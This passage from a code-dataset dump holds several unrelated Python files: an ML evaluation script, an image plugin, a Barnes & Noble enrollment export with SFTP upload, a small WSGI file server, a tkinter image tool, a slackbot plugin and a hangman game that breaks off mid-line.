model_file_path, device, output_file_name):\n cumulative_len = dataset.cumulative_len\n indices_golds = dataset.shints\n \n with torch.no_grad():\n counter = 0\n dataloader = DataLoader(dataset, batch_size=batch_size,\n shuffle=False, num_workers=batch_size)\n indices_preds = []\n all_weights = []\n all_scores = []\n\n current_document_labels = []\n current_document_weights = []\n current_document_scores = []\n for batch in tqdm(dataloader):\n for key in batch.keys():\n batch[key] = batch[key].to(device)\n predict_se = model.module.predict if hasattr(model, 'module') else model.predict\n current_labels, current_scores, current_weights = predict_se(batch)\n\n for label, weight, score in zip(current_labels, current_weights, current_scores):\n if counter + 1 in cumulative_len:\n current_document_labels += label\n current_document_weights.append(weight)\n 
current_document_scores += score\n current_document_indices = np.where(np.array(current_document_labels) == 1)[0].tolist()\n indices_preds.append(current_document_indices)\n all_weights.append(current_weights)\n all_scores.append(current_document_scores)\n current_document_labels = []\n current_document_weights = []\n current_document_scores = []\n \n else:\n current_document_labels += label\n current_document_weights.append(weight)\n current_document_scores += score\n \n counter = counter + 1\n \n logger.debug(\"indices_golds:{}\".format(len(indices_golds)))\n logger.debug(\"indices_preds:{}\".format(len(indices_preds)))\n\n assert len(indices_golds) == len(indices_preds) == len(all_weights)\n\n metrics = eval_sp(indices_golds, indices_preds)\n preprocessed_data = eval_preprocess(data, indices_preds, all_weights, all_scores)\n with open(model_file_path+'/'+output_file_name, 'w') as f:\n f.write(str(metrics) + '\\n')\n f.write(get_analysis(preprocessed_data))\n\n\ndef eval_preprocess(data, indices_preds, all_weights, all_scores):\n for document_i, document in enumerate(data):\n document['QUESTIONS'][0]['sp'] = indices_preds[document_i]\n document['QUESTIONS'][0]['scores'] = all_scores[document_i]\n document['QUESTIONS'][0]['weights'] = all_weights[document_i]\n return data\n\n\nif __name__=='__main__':\n main()\n\n","sub_path":"src/predict_attn_aggregate.py","file_name":"predict_attn_aggregate.py","file_ext":"py","file_size_in_byte":6235,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"356720087","text":"import os\nimport csv\nimport maskgen\nfrom maskgen.external.api import BrowserAPI\n\n\"\"\"\nPick an image from the browser.\nUsed with batch project's ImageSelectionPluginOperation\n\"\"\"\n\ndef loadExclusions(filename):\n import json\n with open(filename,'r') as fp:\n return json.load(fp, encoding='utf-8')['data']\n\ndef transform(img, source, target, **kwargs):\n import json\n api = BrowserAPI()\n # check membership in kwargs itself, not in kwargs['prefix']\n prefix = kwargs['prefix'] if 'prefix' in kwargs else 'images'\n directory = kwargs['directory'] if 'directory' in kwargs else '.'\n query_param = kwargs['query json'] if 'query json' in kwargs else '{}'\n query = query_param if type(query_param) == dict else json.loads(query_param)\n exclusions = None\n skip = set()\n if 'exclusions file' in kwargs:\n source_name = os.path.basename(source)\n exclusions_map = loadExclusions(kwargs['exclusions file'])\n for k,v in exclusions_map.iteritems():\n skip.add(k)\n if source_name[0:len(k)] == k:\n exclusions = v\n return {'file': api.pull(query, directory=directory, exclusions=exclusions,prefix = prefix)}, None\n\n\ndef operation():\n return {'name': 'SelectFile',\n 'category': 'Select',\n 'description': 'Select image based on a pairing to an existing image.',\n 'software': 'maskgen',\n 'version': maskgen.__version__[0:3],\n 'arguments': {'directory': {'type': \"text\",\n 'description': \"location of the paired images\"},\n 'prefix': {'type': \"list\",\n 'values': ['images','videos'],\n 'description': \"type\"},\n 'exclusions file': {\n 'type': \"text\",\n 'description': \"location of file with exclusions\"},\n 'query json': {'type': \"text\",\n 'description': \"JSON query\"}\n },\n 'transitions': [\n 'image.image'\n ]\n }\n\n\ndef suffix():\n return None\n","sub_path":"plugins/PickMediaFromBrowser/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":2188,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"}
+{"seq_id":"356839847","text":"import json\n\ndef saveToFile(data,fileName=\"dataToFile\",fileType=\"txt\"):\n dataFile=open(\"../data/\"+fileName+\".\"+fileType,'w')\n if fileType=='txt':\n fileContent=''\n for row in data:\n for d in row:\n fileContent+=str(d)+'\\t'\n fileContent+='\\n'\n dataFile.write(fileContent)\n if fileType=='json':\n dataFile.write(json.dumps(data))\n dataFile.close()","sub_path":"code/dataToFile.py","file_name":"dataToFile.py","file_ext":"py","file_size_in_byte":419,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"116969117","text":"#! /usr/bin/env python3\r\n# -*- coding: utf-8 -*-\r\n\r\nimport django\r\nimport os\r\nimport pysftp\r\nimport sys\r\nimport shutil\r\nimport zipfile\r\nimport os.path\r\nimport datetime\r\n\r\nfrom datetime import date, timedelta, datetime\r\n\r\nfrom os import path\r\n\r\nfrom django.conf import settings\r\nfrom djimix.core.utils import get_connection\r\nfrom djimix.core.utils import xsql\r\nfrom django.core.cache import cache\r\nfrom djtools.utils.mail import send_mail\r\n\r\nfrom djmapache.sql.barnesandnoble.crs_enr_sql import COURSES, USERS, \\\r\n ENROLLMENTS\r\n\r\n# django settings for shell environment\r\nos.environ.setdefault('DJANGO_SETTINGS_MODULE', 'djmapache.settings.shell')\r\n\r\n# required for interacting with django infrastructure e.g. templates\r\ndjango.setup()\r\n\r\n\r\n# informix environment\r\nos.environ['INFORMIXSERVER'] = settings.INFORMIXSERVER\r\nos.environ['DBSERVERNAME'] = settings.DBSERVERNAME\r\nos.environ['INFORMIXDIR'] = settings.INFORMIXDIR\r\nos.environ['ODBCINI'] = settings.ODBCINI\r\nos.environ['ONCONFIG'] = settings.ONCONFIG\r\nos.environ['INFORMIXSQLHOSTS'] = settings.INFORMIXSQLHOSTS\r\nos.environ['LD_LIBRARY_PATH'] = settings.LD_LIBRARY_PATH\r\nos.environ['LD_RUN_PATH'] = settings.LD_RUN_PATH\r\n\r\nDEBUG = settings.DEBUG\r\nINFORMIX_DEBUG = settings.INFORMIX_DEBUG\r\nBASE_DIR = settings.BASE_DIR\r\nTO = settings.BARNESNOBLE_TO_EMAIL\r\nFROM = settings.BARNESNOBLE_FROM_EMAIL\r\nSUBJECT = \"[Barnes & Noble] upload {status}\".format\r\n\r\n\r\ndef fn_format_date(date):\r\n if len(date) == 10:\r\n ret = date[6:] + \"-\" + date[:2] + '-' + date[3:5]\r\n else:\r\n ret = \"\"\r\n return ret\r\n\r\ndef main():\r\n \"\"\"Barnes and Noble Upload.\"\"\"\r\n ###########################################################################\r\n # OpenSSH 7.0 and greater disable the ssh-dss (DSA) public key algorithm,\r\n # which B&N use for authentication on their servers, so you have to add\r\n # ssh-dss to the ssh/sftp command:\r\n #\r\n # -oHostKeyAlgorithms=+ssh-dss\r\n #\r\n # or add the following to the cron user's .ssh/config file:\r\n #\r\n # Host rex-sftp.bncollege.com\r\n # HostName rex-sftp.bncollege.com\r\n # HostKeyAlgorithms=+ssh-dss\r\n ###########################################################################\r\n\r\n # Defines file names and directory location\r\n # bn_course_fil = ('{0}carthage_students.txt'.format(\r\n # settings.ADIRONDACK_TXT_OUTPUT)\r\n # )\r\n\r\n # bn_course_file = settings.BARNES_N_NOBLE_CSV_OUTPUT + \"courses.csv\"\r\n # bn_enr_fil = settings.BARNES_N_NOBLE_CSV_OUTPUT + \"enrollments.csv\"\r\n # bn_usr_fil = settings.BARNES_N_NOBLE_CSV_OUTPUT + \"users.csv\"\r\n # bn_zip_fil = settings.BARNES_N_NOBLE_CSV_OUTPUT + \"carthage_bn\"\r\n\r\n \"\"\"To get the last query date from cache\"\"\"\r\n\r\n last_sql_date = cache.get('BN_Sql_date')\r\n # print(last_sql_date)\r\n\r\n bn_course_file = \"courses.csv\"\r\n 
bn_enr_fil = \"enrollments.csv\"\r\n bn_usr_fil = \"users.csv\"\r\n bn_zip_fil = \"carthage_bncroster.zip\"\r\n # /data2/www/data/barnesandnoble/enrollments/carthage_bncroster.zip\"\"\r\n\r\n # print(settings.BARNES_N_NOBLE_CSV_OUTPUT + bn_zip_fil)\r\n if path.exists(settings.BARNES_N_NOBLE_CSV_OUTPUT + bn_zip_fil):\r\n os.remove(settings.BARNES_N_NOBLE_CSV_OUTPUT + bn_zip_fil)\r\n\r\n \"\"\"Create the headers for the three files\"\"\"\r\n fil = open(bn_course_file, 'w')\r\n fil.write(\"recordNumber,campus,school,institutionDepartment,term,\"\r\n \"department,course,section,campusTitle,schoolTitle,\"\r\n \"institutionDepartmentTitle,courseTitle,\"\r\n \"institutionCourseCode,institutionClassCode,\"\r\n \"institutionSubjectCodes,institutionSubjectsTitle,\"\r\n \"crn,termTitle,termType,termStartDate,termEndDate,\"\r\n \"sectionStartDate,sectionEndDate,classGroupId,\"\r\n \"estimatedEnrollment\" + \"\\n\")\r\n fil.close()\r\n\r\n fil1 = open(bn_enr_fil, 'w')\r\n fil1.write(\"recordNumber,campus,school,institutionDepartment,term,\"\r\n \"department,course,section,email,firstName,middleName,\"\r\n \"lastName,userRole,sisUserId,includedInCourseFee,\"\r\n \"studentFullPartTimeStatus,creditHours\" + \"\\n\")\r\n fil1.close()\r\n\r\n\r\n fil2 = open(bn_usr_fil, 'w')\r\n fil2.write(\"recordNumber,campus,school,email,firstName,middleName,\"\r\n \"lastName,userRole,sisUserId\" + \"\\n\")\r\n fil2.close()\r\n\r\n\r\n try:\r\n # set global variable\r\n # global EARL\r\n # # determines which database is being called from the command line\r\n # if database == 'cars':\r\n EARL = settings.INFORMIX_ODBC\r\n # elif database == 'train':\r\n # EARL = settings.INFORMIX_ODBC_TRAIN\r\n # else:\r\n # print(\"database must be: 'cars' or 'train'\")\r\n # exit(-1)\r\n\r\n crs_qry = COURSES\r\n\r\n connection = get_connection(EARL)\r\n # connection closes when exiting the 'with' block\r\n blank = \"\"\r\n with connection:\r\n data_result = xsql(\r\n crs_qry, connection, key=settings.INFORMIX_DEBUG\r\n ).fetchall()\r\n\r\n ret = list(data_result)\r\n if ret is None:\r\n # print(\"No result\")\r\n SUBJECT = \"[Barnes and Noble Crs Enr] Application failed\"\r\n BODY = \"Course Query returned no data.\"\r\n send_mail(\r\n None, settings.BARNES_N_NOBLE_TO_EMAIL, SUBJECT,\r\n settings.BARNES_N_NOBLE_FROM_EMAIL, 'email.html', BODY, )\r\n\r\n else:\r\n # print(ret)cd\r\n cnt = 1\r\n\r\n # print(\"Open file 1\")\r\n fil = open(bn_course_file, 'a')\r\n for row in ret:\r\n # fil.write(row)\r\n campus = '\"' + row[0] + '\"'\r\n # school = '\"' + row[1] + '\"'\r\n school = '\"' + blank + '\"'\r\n institutionDepartment = row[2]\r\n term = '\"' + row[3] + '\"'\r\n department = '\"' + row[4] + '\"'\r\n course = '\"' + row[5] + '\"'\r\n SectionCode = '\"' + row[6] + '\"'\r\n campusTitle = '\"' + row[7] + '\"'\r\n # schoolTitle = '\"' + row[8] + '\"'\r\n schoolTitle = '\"' + blank + '\"'\r\n institutionDepartmentTitle = '\"' + row[9] + '\"'\r\n courseTitle = '\"' + row[10].strip() + '\"'\r\n institutionCourseCode = '\"' + row[11] + '\"'\r\n institutionClassCode = '\"' + row[12] + '\"'\r\n institutionSubjectCodes = '\"' + row[13] + '\"'\r\n institutionSubjectsTitle = '\"' + row[14].strip() + '\"'\r\n crn = '\"' + row[15] + '\"'\r\n termTitle = '\"' + row[16] + '\"'\r\n termType = '\"' + row[17] + '\"'\r\n termStartDate = '\"' + fn_format_date(row[18]) + '\"'\r\n termEndDate = '\"' + fn_format_date(row[19]) + '\"'\r\n sectionStartDate = '\"' + fn_format_date(row[20]) + '\"'\r\n sectionEndDate = '\"' + fn_format_date(row[21]) + '\"'\r\n 
classGroupId = '\"' + row[22] + '\"'\r\n estimatedEnrollment = str(row[23])\r\n\r\n lin = str(cnt) + \",\" + campus + \",\" + school + \",\" + \\\r\n institutionDepartment + \",\" + term + \",\" + \\\r\n department + \",\" + course + \",\" + SectionCode + \",\" + \\\r\n campusTitle + \",\" + schoolTitle + \",\" + \\\r\n institutionDepartmentTitle + \",\" + courseTitle \\\r\n + \",\" + institutionCourseCode + \",\" + \\\r\n institutionClassCode + \",\" + institutionSubjectCodes \\\r\n + \",\" + institutionSubjectsTitle + \",\" + crn + \",\" + \\\r\n termTitle + \",\" + termType + \",\" + termStartDate \\\r\n + \",\" + termEndDate + \",\" + sectionStartDate + \",\" + \\\r\n sectionEndDate + \",\" + classGroupId + \",\" + \\\r\n estimatedEnrollment + \"\\n\"\r\n\r\n fil.write(lin)\r\n cnt = cnt + 1\r\n fil.close()\r\n # print(\"Close file 1\")\r\n\r\n\r\n connection = get_connection(EARL)\r\n # connection closes when exiting the 'with' block\r\n with connection:\r\n data_result = xsql(\r\n USERS, connection, key=settings.INFORMIX_DEBUG\r\n ).fetchall()\r\n\r\n ret = list(data_result)\r\n if ret is None:\r\n # print(\"No result\")\r\n SUBJECT = \"[Barnes and Noble Crs Enr] Application failed\"\r\n BODY = \"User Query returned no data.\"\r\n send_mail(\r\n None, settings.BARNES_N_NOBLE_TO_EMAIL, SUBJECT,\r\n settings.BARNES_N_NOBLE_FROM_EMAIL, 'email.html', BODY, )\r\n\r\n else:\r\n # print(ret)\r\n cnt = 1\r\n # print(\"Open file 2\")\r\n\r\n fil2 = open(bn_usr_fil, 'a')\r\n for row in ret:\r\n # print(row)\r\n campus = '\"' + row[0] + '\"'\r\n school = '\"' + blank + '\"'\r\n email = '\"' + row[2] + '\"'\r\n firstname = '\"' + row[3] + '\"'\r\n middlename = '\"' + row[4] + '\"'\r\n lastname = '\"' + row[5] + '\"'\r\n role = '\"' + row[6].strip() + '\"'\r\n username = '\"' + str(row[8]) + '\"'\r\n\r\n lin = str(cnt) + \",\" + campus + \",\" + school + \",\" + \\\r\n email + \",\" + firstname + \",\" + \\\r\n middlename + \",\" + lastname + \",\" + role + \",\" + \\\r\n username + \"\\n\"\r\n\r\n # print(lin)\r\n\r\n fil2.write(lin)\r\n cnt = cnt + 1\r\n fil2.close()\r\n # print(\"Close file 2\")\r\n\r\n\r\n \"\"\"Connect to Database\"\"\"\r\n connection = get_connection(EARL)\r\n # connection closes when exiting the 'with' block\r\n with connection:\r\n data_result = xsql(\r\n ENROLLMENTS, connection, key=settings.INFORMIX_DEBUG\r\n ).fetchall()\r\n\r\n ret = list(data_result)\r\n if ret is None:\r\n # print(\"No result\")\r\n SUBJECT = \"[Barnes and Noble Crs Enr] Application failed\"\r\n BODY = \"ENROLLMENTS Query returned no data.\"\r\n send_mail(\r\n None, settings.BARNES_N_NOBLE_TO_EMAIL, SUBJECT,\r\n settings.BARNES_N_NOBLE_FROM_EMAIL, 'email.html', BODY, )\r\n\r\n else:\r\n # print(ret)\r\n cnt = 1\r\n # print(\"Open file 3\")\r\n fil3 = open(bn_enr_fil, 'a')\r\n for row in ret:\r\n # print(row)\r\n campus = '\"' + row[0] + '\"'\r\n school = '\"' + blank + '\"'\r\n inst_dept = '\"' + row[2] + '\"'\r\n term = '\"' + row[3] + '\"'\r\n dept = '\"' + row[4] + '\"'\r\n course = '\"' + row[5] + '\"'\r\n section = '\"' + row[6].strip() + '\"'\r\n email = '\"' + row[7] + '\"'\r\n\r\n firstname = '\"' + row[8] + '\"'\r\n middlename = '\"' + row[9] + '\"'\r\n lastname = '\"' + row[10] + '\"'\r\n role = '\"' + row[11] + '\"'\r\n userid = '\"' + str(row[12]) + '\"'\r\n includeinfee = '\"' + row[13] + '\"'\r\n fulltimestatus = '\"' + row[14] + '\"'\r\n credit_hours = '\"' + str(row[15]) + '\"'\r\n\r\n lin = str(cnt) + \",\" + campus + \",\" + school + \",\" + \\\r\n inst_dept + \",\" + term + \",\" 
+ \\\r\n dept + \",\" + course + \",\" + \\\r\n section + \",\" + email + \",\" + \\\r\n firstname + \",\" + middlename + \",\" + \\\r\n lastname + \",\" + role + \",\" + userid + \",\" + \\\r\n includeinfee + \",\" + fulltimestatus + \",\" + \\\r\n credit_hours + \"\\n\"\r\n\r\n # print(lin)\r\n fil3.write(lin)\r\n cnt = cnt + 1\r\n fil3.close()\r\n # print(\"Close file 3\")\r\n\r\n\r\n \"\"\"Create Archive\"\"\"\r\n zf = zipfile.ZipFile(bn_zip_fil, mode='w')\r\n\r\n zf.write(bn_course_file)\r\n zf.write(bn_usr_fil)\r\n zf.write(bn_enr_fil)\r\n\r\n \"\"\"Move Zip File\"\"\"\r\n shutil.move(bn_zip_fil, settings.BARNES_N_NOBLE_CSV_OUTPUT)\r\n\r\n \"\"\"Send the file...\"\"\"\r\n cnopts = pysftp.CnOpts()\r\n cnopts.hostkeys = None\r\n xtrnl_connection = {\r\n 'host': settings.BARNESNOBLE_AIP_HOST,\r\n 'username': settings.BARNESNOBLE_AIP_USER,\r\n 'port': settings.BARNESNOBLE_AIP_PORT,\r\n 'private_key': settings.BARNESNOBLE_AIP_KEY,\r\n 'cnopts': cnopts,\r\n }\r\n\r\n try:\r\n with pysftp.Connection(**xtrnl_connection) as sftp:\r\n sftp.cwd('inbox')\r\n print(\"Connected\")\r\n\r\n remotepath = sftp.listdir()\r\n # print(remotepath)\r\n\r\n phile = os.path.join(settings.BARNES_N_NOBLE_CSV_OUTPUT\r\n + bn_zip_fil)\r\n print(\"Put \" + phile)\r\n sftp.put(phile)\r\n sftp.close()\r\n\r\n # print(\"Remove temp csv files\")\r\n os.remove(bn_usr_fil)\r\n os.remove(bn_course_file)\r\n os.remove(bn_enr_fil)\r\n\r\n except Exception as error:\r\n # print(\"Unable to PUT settings.BARNES_N_NOBLE_CSV_OUTPUT + \"\r\n # \"bn_zip_fil to Barnes and Noble \"\r\n # \"server.\\n\\n{0}\".format(error))\r\n SUBJECT = \"[Barnes and Noble Crs Enr] Application failed\"\r\n BODY = \"Unable to PUT settings.BARNES_N_NOBLE_CSV_OUTPUT \" \\\r\n + bn_zip_fil \\\r\n + \" to Barnes and Noble server.\\n\\n{0}\".format(error)\r\n\r\n send_mail(None, TO, SUBJECT(status='failed'), FROM,\r\n 'email.html', body, )\r\n\r\n send_mail(\r\n None, settings.BARNES_N_NOBLE_TO_EMAIL, SUBJECT,\r\n settings.BARNES_N_NOBLE_FROM_EMAIL, 'email.html', BODY, )\r\n\r\n #To set a new date in cache\r\n a = datetime.now()\r\n last_sql_date = a.strftime('%Y-%m-%d %H:%M:%S')\r\n cache.set('BN_Sql_date', last_sql_date)\r\n\r\n except Exception as e:\r\n print(\"Error in main: \" + str(e))\r\n SUBJECT = \"[Barnes and Noble Crs Enr] Application failed\"\r\n BODY = \"Error in main: \" + str(e)\r\n send_mail(\r\n None,\r\n settings.BARNES_N_NOBLE_TO_EMAIL,\r\n SUBJECT,\r\n settings.BARNES_N_NOBLE_FROM_EMAIL,\r\n 'email.html',\r\n BODY,\r\n )\r\n\r\n\r\nif __name__ == \"__main__\":\r\n sys.exit(main())\r\n","sub_path":"djmapache/bin/barnesandnoble_crs_enr.py","file_name":"barnesandnoble_crs_enr.py","file_ext":"py","file_size_in_byte":15159,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"259040446","text":"import mimetypes\nfrom wsgiref.simple_server import make_server\n\n\ndef app(environ, start_response):\n path_info = environ[\"PATH_INFO\"]\n mimetypes.add_type('application/wasm', '.wasm')\n mimetypes.add_type('text/html', '.data')\n if path_info == '/':\n path_info = \"/olapy.html\"\n\n resource = \"_build\" + path_info\n headers = []\n headers.append((\"Content-Type\", mimetypes.guess_type(path_info.split(\"/\")[-1])[0]))\n headers.append(('Access-Control-Allow-Origin', '*'))\n\n with open(resource, \"rb\") as f:\n resp_file = f.read()\n\n start_response(\"200 OK\", headers)\n return [resp_file]\n\n\ndef runserver(environ, start_response):\n # http://127.0.0.1:8080/cubes/sales/Facts.csv\n 
server = make_server(\"0.0.0.0\", 8080, app)\n server.serve_forever()\n","sub_path":"build_olapy_by_yourself/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":785,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"536756286","text":"import tkinter as tk\nfrom tkinter import ttk\nfrom tkinter import filedialog as fd\nimport random\nfrom tkinter import*\nfrom PIL import Image\n\n\n# create the root window\nroot = tk.Tk()\nroot.geometry('300x150')\n\n# comment this function\n'''\ndef get_file():\n global my_image\n filename = input(\"please give a file name \")\n my_image = Image.open(filename)\n'''\n\n\n# add this function to your code\ndef select_files():\n filetypes = (('image files', '*.jpg *.png'), ('All files', '*.*'))\n filename = fd.askopenfilename(title='Open files', initialdir='/', filetypes=filetypes)\n my_image = Image.open(filename)\n # change this call to your function name\n loop_img(my_image)\n # change this call to your function name\n\n\n# add the parameter my_image to your function\ndef loop_img(my_image):\n # random_int = random.randint(0,10)\n # my_image = Image.new(mode=\"RGB\",size=(10,10),color=(0,0,0))\n sliderred2 = sliderred.get()\n sliderblue2 = sliderblue.get()\n slidergreen2 = slidergreen.get()\n\n skiplines = spin1.get()\n skiplines_int = int(skiplines)\n\n skip_pixels = spin2.get()\n skip_pixels_int = int(skip_pixels)\n\n print (slidergreen2,sliderred2,sliderblue2)\n\n\n rows = my_image.size[0]\n cols = my_image.size[1]\n\n\n px = my_image.load()\n\n for i in range(0, rows, skiplines_int):\n start = random.randint(0, rows)\n end = random.randint(0, cols)\n nub = random.randint(1, 10)\n\n if i % 2 == 0:\n start = 0\n else:\n start = 1\n\n for j in range(start, cols, nub):\n # you should have your slider code here\n # you should have your slider code here\n # you should have your slider code here\n red = random.randint(0, sliderred2)\n green = random.randint(0, slidergreen2)\n blue = random.randint(0, sliderblue2)\n '''\n if j % 2 == 0:\n red = 0\n green = 0\n blue = 0\n else:\n red = 255\n green = 255\n blue = 255\n '''\n px[i, j] = (red, green, blue)\n\n my_image.show()\n\nsliderred = Scale(root,from_=0, to=255, orient=HORIZONTAL, background='red', fg='grey')\nsliderred.grid(row=7, column=1)\nsliderblue = Scale(root,from_=0, to=255, orient=HORIZONTAL, background='blue', fg='grey')\nsliderblue.grid(row=8, column=1)\nslidergreen = Scale(root,from_=0, to=255, orient=HORIZONTAL, background='green', fg='grey')\nslidergreen.grid(row=8, column=2)\n\nspin1 = Spinbox(root, from_=1, to=10, width=3)\nspin1.grid(row=1, column=1)\nspin2 = Spinbox(root, from_=1, to=10, width=3)\nspin2.grid(row=1, column=0)\n# open button --- add this to your code\nopen_button = ttk.Button(root, text='Open Files', command=select_files)\nopen_button.grid(row=0, column=2)\n\nroot.mainloop()","sub_path":".idea/Bettercode.py","file_name":"Bettercode.py","file_ext":"py","file_size_in_byte":2850,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"61782518","text":"#! 
/usr/bin/env python\n#\n# tick.py ---\n#\n# Filename: tick.py\n# Description:\n# Author: Werther Zhang\n# Maintainer:\n# Created: Tue Oct 11 16:07:15 2016 (+0800)\n#\n\n# Change Log:\n#\n#\n\n# -*- coding: utf-8 -*-\n\nimport time\nfrom slackbot.bot import tick_task\n\ncount = 0\nnext_time = 0\n\n@tick_task\ndef hello(message):\n    global count\n    global next_time\n    now = time.time()\n    # rate-limit: do nothing until the next scheduled time\n    if now < next_time:\n        return\n    next_time = now + 5 # every 5 seconds\n    message.send_to('werther0331', 'hello {}'.format(count))\n    count += 1\n","sub_path":"slackbot/plugins/tick.py","file_name":"tick.py","file_ext":"py","file_size_in_byte":543,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"}
+{"seq_id":"284820977","text":"# Problem Set 2, hangman.py\n# Name: \n# Collaborators:\n# Time spent:\n\n# Hangman Game\n# -----------------------------------\n# Helper code\n# You don't need to understand this helper code,\n# but you will have to know how to use the functions\n# (so be sure to read the docstrings!)\nimport random\nimport string\nimport os\t# the os module is used to build an absolute path relative to this file\n\nWORDLIST_FILENAME = (os.path.abspath(os.path.dirname(__file__))+\"\\\\words.txt\")\n# the word list file words.txt must sit in the same directory as this .py file\n\n\ndef load_words():\n\n\tprint(\"Loading word list from file...\")\n\t# inFile: file\n\tinFile = open(WORDLIST_FILENAME, 'r')\n\t# line: string\n\tline = inFile.readline()\n\t# wordlist: list of strings\n\twordlist = line.split()\n\tprint(\"  \", len(wordlist), \"words loaded.\")\n\treturn wordlist\n\n\n\ndef choose_word(wordlist):\n\n\treturn random.choice(wordlist)\n\n# end of helper code\n\n# -----------------------------------\n\n# Load the list of words into the variable wordlist\n# so that it can be accessed from anywhere in the program\nwordlist = load_words()\n\n\ndef is_word_guessed(secret_word, letters_guessed):\n\t# return True only if every letter of the secret word has been guessed\n\tfor letter in secret_word:\n\t\tif letter not in letters_guessed:\n\t\t\treturn False\n\treturn True\n\n\n\ndef get_guessed_word(secret_word, letters_guessed):\n\t# start from a copy of the secret word\n\tguessed_word = secret_word\n\tfor i in guessed_word :\n\t\tif i not in letters_guessed:\n\t\t\tguessed_word = guessed_word.replace(i,\"_ \")\n\t\t\t# letters that have not been guessed yet are replaced with '_ '\n\treturn guessed_word\n\n\n\ndef get_available_letters(letters_guessed):\n\t# start from the full lowercase alphabet\n\tavailable_letters = string.ascii_lowercase\n\tfor i in available_letters:\n\t\tif i in letters_guessed:\n\t\t\tavailable_letters = available_letters.replace(i,'')\n\t\t\t# drop letters that have already been guessed\n\treturn available_letters\n\n\ndef hangman(secret_word):\n\n\t# initialize the key state variables\n\tguesses_remaining = 6\n\twarnings_remaining = 3\n\tunique_letters = 0\t\t# number of distinct letters in the secret word\n\tletters_guessed = []\n\tflag_win = False\n\t\n\tprint(\"Welcome to the game Hangman!\")\n\tprint(\"I am thinking of a word that is \"+str(len(secret_word))+\" letters long.\")\n\tprint(\"You have \"+str(warnings_remaining)+\" warnings left.\")\n\twhile(guesses_remaining > 0 and not flag_win):\n\t# keep playing while guesses remain and the word is not yet guessed\n\t\tprint(\"----------------------------------\")\n\t\tprint(\"You have \"+str(guesses_remaining)+\" guesses left\")\n\t\tprint(\"Available letters: \"+get_available_letters(letters_guessed))\n\t\tletter_guessed = input(\"Please guess a letter: \")\n\t\tif len(letter_guessed)!=1 or letter_guessed not in get_available_letters(letters_guessed):\n\t\t# invalid input: anything that is not a single, not-yet-guessed letter\n\t\t\tif warnings_remaining > 0:\n\t\t\t\twarnings_remaining -= 1\n\t\t\t\tif len(letter_guessed)!=1:\n\t\t\t\t\tprint(\"Oops! You need to input only a letter. You now have \"+str(warnings_remaining)+\" warnings: \")\n\t\t\t\telse:\n\t\t\t\t\tprint(\"Oops! You've already guessed that letter. You now have \"+str(warnings_remaining)+\" warnings: \")\n\t\t\t\tprint(get_guessed_word(secret_word, letters_guessed))\n\t\t\t\t# deduct one warning\n\t\t\telse:\n\t\t\t\tprint(\"Oops! You've already guessed that letter. You have no warnings left\")\n\t\t\t\tguesses_remaining -= 1\n\t\t\t\tprint(\"so you lose one guess: \"+get_guessed_word(secret_word, letters_guessed))\n\t\t\t\t# no warnings left: deduct one guess instead\n\t\t\tcontinue\n\t\tletters_guessed.append(letter_guessed)\n\t\tif letter_guessed in secret_word:\n\t\t\tprint(\"Good guess!: \"+get_guessed_word(secret_word, letters_guessed))\n\t\t\tunique_letters += 1\n\t\t\t# correct guess: one more distinct letter found (one correct guess is needed per distinct letter)\n\t\telse:\n\t\t\tprint(\"Oops! That letter is not in my word: \"+get_guessed_word(secret_word, letters_guessed))\n\t\t\tif letter_guessed in ['a','e','i','o']:\n\t\t\t\tguesses_remaining -= 1\t# these vowels cost one extra guess\n\t\t\tguesses_remaining -= 1\n\t\tflag_win = is_word_guessed(secret_word, letters_guessed)\n\t\t# check whether the word is now fully guessed\n\tTotal_score = guesses_remaining * unique_letters\n\tif(flag_win):\n\t\tprint(\"Congratulations, you won!\")\n\t\tprint(\"Your total score for this game is: \"+str(Total_score))\n\t\t# on a win, report the score\n\telse:\n\t\tprint(\"Sorry, you ran out of guesses. The word was \"+str(secret_word))\n\n\n# When you've completed your hangman function, scroll down to the bottom\n# of the file and uncomment the first two lines to test\n#(hint: you might want to pick your own\n# secret_word while you're doing your own testing)\n\n\n# -----------------------------------\n\n\n\ndef match_with_gaps(my_word, other_word):\n\tmyword_not_b = my_word.replace(' ','')\n\t# strip the spaces out of the masked word\n\tif(len(myword_not_b) != len(other_word)):\n\t\t# words of different lengths can never match\n\t\treturn False\n\tfor i in range(len(myword_not_b)):\n\t\tif myword_not_b[i] != '_' and myword_not_b[i] != other_word[i]:\n\t\t# a revealed letter that differs means the words do not match\n\t\t\treturn False\n\treturn True\n\n\n\ndef show_possible_matches(my_word):\n\tmatches_flag = False\n\tfor word in wordlist:\n\t\tif match_with_gaps(my_word,word):\n\t\t# print every word in the word list that matches the pattern\n\t\t\tprint(word,end='')\n\t\t\tprint(\" \",end='')\n\t\t\tmatches_flag = True\n\tif not matches_flag:\n\t\tprint(\"No matches found\")\n\telse:\n\t\tprint(\"\")\n\n\n\ndef hangman_with_hints(secret_word):\n\t# same as hangman(), with extra handling for '*'\n\tguesses_remaining = 6\n\twarnings_remaining = 3\n\tunique_letters = 0\n\tletters_guessed = []\n\tflag_win = False\n\t\n\tprint(\"Welcome to the game Hangman!\")\n\tprint(\"I am thinking of a word that is \"+str(len(secret_word))+\" letters long.\")\n\tprint(\"You have \"+str(warnings_remaining)+\" warnings left.\")\n\twhile(guesses_remaining > 0 and not flag_win):\n\t\tprint(\"----------------------------------\")\n\t\tprint(\"You have \"+str(guesses_remaining)+\" guesses left\")\n\t\tprint(\"Available letters: \"+get_available_letters(letters_guessed))\n\t\tletter_guessed = input(\"Please guess a letter: \")\n\t\tif letter_guessed == '*':\n\t\t# on '*', show every word that matches the current pattern\n\t\t\tprint(\"Possible word matches are: \")\n\t\t\tshow_possible_matches(get_guessed_word(secret_word, letters_guessed))\n\t\t\tcontinue\n\t\tif len(letter_guessed)!=1 or letter_guessed not in 